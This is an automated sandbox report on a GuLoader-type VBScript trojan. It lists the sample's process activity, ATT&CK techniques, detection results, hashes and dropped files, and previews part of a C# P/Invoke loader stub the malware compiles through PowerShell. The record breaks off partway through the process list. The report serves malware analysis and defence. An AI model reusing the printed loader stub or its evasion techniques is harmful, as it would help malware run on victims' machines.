Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts21
Command and Scripting Interpreter		Path Interception11
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium1
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts421
Scripting		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts21
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts1
PowerShell		Logon Script (Windows)Logon Script (Windows)11
Process Injection		Security Account Manager21
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Deobfuscate/Decode Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script421
Scripting		LSA Secrets1
File and Directory Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common2
Obfuscated Files or Information		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 756154 Sample: SIEM_PO00938467648.vbs Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 29 Malicious sample detected (through community Yara rule) 2->29 31 Antivirus detection for URL or domain 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 4 other signatures 2->35 8 wscript.exe 1 1 2->8         started        process3 signatures4 37 VBScript performs obfuscated calls to suspicious functions 8->37 39 Wscript starts Powershell (via cmd or directly) 8->39 41 Obfuscated command line found 8->41 43 Very long command line found 8->43 11 powershell.exe 22 8->11         started        14 cmd.exe 1 8->14         started        process5 file6 27 C:\Users\user\AppData\...\jadyuuoq.cmdline, Unicode 11->27 dropped 16 csc.exe 3 11->16         started        19 conhost.exe 11->19         started        21 conhost.exe 14->21         started        process7 file8 25 C:\Users\user\AppData\Local\...\jadyuuoq.dll, PE32 16->25 dropped 23 cvtres.exe 1 16->23         started        process9

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
SIEM_PO00938467648.vbs35%ReversingLabsScript-WScript.Trojan.GuLoader

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.dll100%Joe Sandbox ML

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
http://crl.microsof0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png7z100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpfalse
    		high
    http://www.apache.org/licenses/LICENSE-2.0.html7zpowershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown
      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://crl.microsofpowershell.exe, 00000003.00000003.499891635.0000000007E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.485360796.0000000007E5D000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        		unknown
        https://contoso.com/powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://contoso.com/Licensepowershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          https://contoso.com/Iconpowershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.823390885.0000000004CA1000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://github.com/Pester/Pester7zpowershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://pesterbdd.com/images/Pester.png7zpowershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown

                World Map of Contacted IPs

                No contacted IP infos

                General Information

                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:756154
                Start date and time:2022-11-29 18:22:11 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 8m 23s
                Hypervisor based Inspection enabled:false
                Report type:full
                Sample file name:SIEM_PO00938467648.vbs
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:12
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.expl.evad.winVBS@11/9@0/0
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 69
                • Number of non-executed functions: 3
                Cookbook Comments:
                • Found application associated with file extension: .vbs
                • Override analysis time to 240s for JS/VBS files not yet terminated

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
                • Execution Graph export aborted for target powershell.exe, PID 2528 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                18:24:27API Interceptor32x Sleep call for process: powershell.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:modified
                Size (bytes):8003
                Entropy (8bit):4.842774286652891
                Encrypted:false
                SSDEEP:192:Jxoe5FVsm5emdgdVFn3eGOVpN6K3bkkjo5igkjDt4iWN3yBGHc9smgdcU6CupO0P:1EdVoGIpN6KQkj2Zkjh4iUxepib4J
                MD5:62F0B7274EE33977F05FE8727590EBA4
                SHA1:3D7D56215FAF3C0F11BBF6A16ABB09DF83E96BA7
                SHA-256:A59280899B286228ABA87CAC2EED2C3FEA4966BF427899B9B9AEF46AD0FD3E00
                SHA-512:001B11A26D8AF5D8FEE3B259D5E10EAA22801662C539BA70B7EBA0A330C9DD1B4F0CFB3B05B0B63CDA103B771506CF7A35A581DF7986E872A187E2E280D5493C
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                C:\Users\user\AppData\Local\Temp\RES8B47.tmp

                Download File
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x486, 9 symbols, created Tue Nov 29 17:24:33 2022, 1st section name ".debug$S"
                Category:dropped
                Size (bytes):1324
                Entropy (8bit):3.996218436024883
                Encrypted:false
                SSDEEP:24:HEF69vZf14pDfHdzYhKPfeI+ycuZhNh6akS+LPNnq9ud:3B14t9+KPm1uloa3Eq9u
                MD5:E733462A8F00DEC1FC3565C028DDE8A1
                SHA1:8C4647CAF72EE736C2AF838FF03E3B17127276CF
                SHA-256:37F83C0D6CAB65759FAA603F14A42FD331171144D95310F68CA438C6C9056554
                SHA-512:57CD59B28F893F4A564B55454D40A83229B83C9EE93788D765AEA99C48AB4C9F1A219660ABF1FBE95CF0F07E49C198E4179E056636A39B84E6FE7F6D4C33C5E6
                Malicious:false
                Preview:L...Q@.c.............debug$S........H...................@..B.rsrc$01........X.......,...........@..@.rsrc$02........P...6...............@..@........S....c:\Users\user\AppData\Local\Temp\jadyuuoq\CSC891590C19254105A6A792E8745AF5FD.TMP...................x.{..qeh.g..........4.......C:\Users\user\AppData\Local\Temp\RES8B47.tmp.-.<...................'...Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.a.d.y.u.u.o.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_25cruns3.fyd.ps1

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1

                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zexzdgsm.feb.psm1

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1

                C:\Users\user\AppData\Local\Temp\jadyuuoq\CSC891590C19254105A6A792E8745AF5FD.TMP

                Download File
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                File Type:MSVC .res
                Category:dropped
                Size (bytes):652
                Entropy (8bit):3.1034732649057704
                Encrypted:false
                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryz6ak7Ynqq+LPN5Dlq5J:+RI+ycuZhNh6akS+LPNnqX
                MD5:A000E1959178D29C7BA215716568AB67
                SHA1:8A0A43A57EA1B760DF7DD1FCDACB6B0A8D959B6E
                SHA-256:E7C6DAF4DD3722664B5B9A8522889734B6894EF4865CF3039AE842ACEF9A9D75
                SHA-512:C598A213FAEC10450E95CEBC5CBA30B2DF8ADD3F2034A8573E4E6F712E60BCA39EFCB890F14A3DB34A24E2994D6A53E20537D86BD816798764962CA5FFB26F17
                Malicious:false
                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.a.d.y.u.u.o.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.a.d.y.u.u.o.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.0.cs

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1049), with no line terminators
                Category:dropped
                Size (bytes):1052
                Entropy (8bit):4.997907941877808
                Encrypted:false
                SSDEEP:24:JVSgTlR8ZhIZFbamwTJI1ro8kkcw+n1csrsIuY:JVlTlR8DIZFbLwTJI1rb/P+n1BrsIX
                MD5:5CB0DD0B77A3DA8C76FA25C6482E90D5
                SHA1:309AAF2851C84D34E8C8FC38B102721126D3E145
                SHA-256:4A5B247BE5F2AD1BF7CB3E184F7F687B5D59C7DE795FD1EAF69B7B0E2F4F716E
                SHA-512:F4842683F2B44C5FE29A03CAC23BCE6358F2FFF9A4CD1232319591CB3A48834C95DC07DA3159584DE2AED4F0EBE9A7A517ED4676D38DC63B35BA405D5FA7BD19
                Malicious:false
                Preview:.using System;using System.Runtime.InteropServices;public static class Tueiron1 {[DllImport("user32")]public static extern int DestroyCaret();[DllImport("gdi32")]public static extern int ScaleWindowExtEx(int Drift,int Ambula,int Baso,int iagtta,int Vejmat158,int Mcgr);[DllImport("kernel32")]public static extern int HeapSize(int Prop,int Adres,int Tortri);[DllImport("shell32.dll")]public static extern void DragFinish(int Omdr);[DllImport("winmm.dll")]public static extern int mixerGetDevCaps(int Nitr,int Fel,int Afs93);[DllImport("kernel32")]public static extern int LockResource(int Lei);[DllImport("kernel32")]public static extern int VirtualAlloc(int v1,int v2,int v3,int v4);[DllImport("ADVAPI32.DLL")]public static extern void MapGenericMask(int Brink,int Midts);[DllImport("kernel32")]public static extern IntPtr EnumSystemLocalesW(uint v1,int v2);[DllImport("kernel32")]public static extern int SetThreadAffinityMask(int Rebuil,int Semis);[DllImport("user32")]public static extern int Se

                C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                Category:dropped
                Size (bytes):369
                Entropy (8bit):5.219534290159127
                Encrypted:false
                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f9jx0zxs7+AEszIwkn23f9jDH:p37Lvkmb6KRf1jx0WZEif1jb
                MD5:71F10E9CBAE1F70E2596C2A61CC97420
                SHA1:FA92CD6FFD26D5C56701CB5FE4D572F729B119CE
                SHA-256:30B8926041F22070E9F6754C5D94C52BFAC40FBC3B48BEE485976A1DC1277915
                SHA-512:D1C7BB4EFC520E61083ABCE94399ED158DB27FE03E1B6116FE14AEE449B7AA91F56F7B42C1106FD48D12660C411C3F0E4D7911C82A32BA53E95FC5D3C10B2C78
                Malicious:true
                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.0.cs"

                C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.dll

                Download File
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):4096
                Entropy (8bit):3.0786957689151206
                Encrypted:false
                SSDEEP:48:6zJk5TZxiz1MDngQzufTbFtAkMl551uloa3Eq:IIWz1MDngVfTTGKWK
                MD5:0CF30C07EE7CDE87ABEEE7BE453FD1C3
                SHA1:6014B950D79EDF5FD4FA7C34ECD4F395BDE51D06
                SHA-256:1D4A45BA7B3ED7B6CBD4843F7C0726EEB014B609A5C283777BB50EF00950BCB8
                SHA-512:207854F6708CA2F1D3013B83B6BDE1FE738484CE091FB422E33660E5C8D7AFCE3A34047E3A6005BF65983ECB5FA214DA48866267D1C9229DC9410E44F23E71D4
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q@.c...........!................^&... ...@....... ....................................@..................................&..W....@.......................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................@&......H.......P ..............................................................BSJB............v4.0.30319......l...t...#~......@...#Strings.... .......#US.(.......#GUID...8...|...#Blob...........G.........%3............................................................0.).....f.....f.......................................... 7............ D............ U............ ^............ i............ y.$.......... ..).......... ..1.......... ..7.......... ..=.......... ..)...................

                C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.out

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (443), with CRLF, CR line terminators
                Category:modified
                Size (bytes):864
                Entropy (8bit):5.331025328863905
                Encrypted:false
                SSDEEP:24:Aqd3ka6KRf1jXEif1jaKaM5DqBVKVrdFAMBJTH:Aika6C1jXEu1jaKxDcVKdBJj
                MD5:E228E21D46CAE1BF0DF2686889AC1F17
                SHA1:7E5670AEEC66BF8A657C47E1C2A6F39F4376F547
                SHA-256:B3F7E73164CC13E52676B39D9C5D2B986B32CADF0A26E480E0D2B38A7609C033
                SHA-512:AD06727C50178B9E77052A326A5C76DDD07E7CBDA819875FFF00A3C908055BB9E6348C7BD447981F6449D33217A2AC74D6C699F0BE03D4D859D61703251437B4
                Malicious:false
                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                Static File Info

                General

                File type:ASCII text, with CRLF line terminators
                Entropy (8bit):5.836608054626225
                TrID:
                  File name:SIEM_PO00938467648.vbs
                  File size:350795
                  MD5:633811bccf3fe62978ce41a04b653083
                  SHA1:bc81307b5c229094617e7cb8cdcaec55eaddad36
                  SHA256:b5e4225737f935940fa23989440d5ea2c123c8affde25d6d7224e2b4abab5608
                  SHA512:ade8c018c14b2c9de5df6c9c82130c309fd85084137d6e919c42b6fe7abb5ffde356f2d951f33ec3355df88f7134d51f66121afa3c7ca9f7bac047e0b73d0fa7
                  SSDEEP:6144:J8YNxYPOwuvNR5vwfZKU2fU/5Mhc1gXcSGN+DieVwzjb6HZIKK:uijvPFWNEClgsSgpeVf6KK
                  TLSH:AB74AE5DDA28DACD4F4E2F4ADC821A47C4654623D02614F9EEB5CB8E11C2ECDCE293D8
                  File Content Preview:..'zephyrian stratagem Wigwamerne177 Alcoholisable53 PROMISINGLY ..'ACETAMID GRANULARITY Mandatet torteaus TANGFORLSENDES ALTOCUMULUS Jambarts ..'Gein187 garglers Goslet Afblsnings ENEHERREDMMERS UNDSEELIGHED TUSSENS Mrtelvrkets139 HOG besvrger stellularl

                  File Icon

                  Icon Hash:e8d69ece869a9ec4

                  Network Behavior

                  No network behavior found

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:18:23:01
                  Start date:29/11/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs"
                  Imagebase:0x7ff65eba0000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:1
                  Start time:18:23:02
                  Start date:29/11/2022
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:CMD.EXE /c echo C:\Windows
                  Imagebase:0x7ff632260000
                  File size:273920 bytes
                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:2
                  Start time:18:23:02
                  Start date:29/11/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7c72c0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:3
                  Start time:18:23:30
                  Start date:29/11/2022
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
